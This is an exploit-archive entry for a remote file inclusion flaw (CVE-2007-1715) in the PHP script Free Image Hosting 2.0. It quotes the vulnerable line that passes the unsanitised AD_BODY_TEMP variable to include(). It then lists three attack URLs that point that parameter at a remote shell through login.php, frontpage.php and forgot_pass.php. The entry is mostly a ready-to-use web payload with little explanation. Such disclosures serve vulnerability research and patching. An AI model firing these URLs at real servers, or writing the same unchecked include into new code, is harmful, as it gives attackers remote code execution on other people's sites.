Free Image Hosting 2.0 - 'AD_BODY_TEMP' Remote File Inclusion

Author: Crackers_Child
type: webapps
platform: php
port: 
date_added: 2007-03-24  
date_updated:   
verified: 1  
codes: OSVDB-37179;CVE-2007-1715  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 3568.txt  
############################################################################################
Baslik  :Image_Upload Script  Remote File Inclusion Exploit
         Free Image Hosting 2.0

.ndir   : http://free-php-scripts.net/scripts/Image_Upload.zip

Bulan   :Crackers_Child

Zay.flk : <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td>

Exploit : www.site.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?

        : www.site.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?

        :www.site.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell ?

Not     :[Olmek Var$a Kaderde Dert Ekleme Derdine ;) ]

Greetz  : EveryBody
############################################################################################

# milw0rm.com [2007-03-25]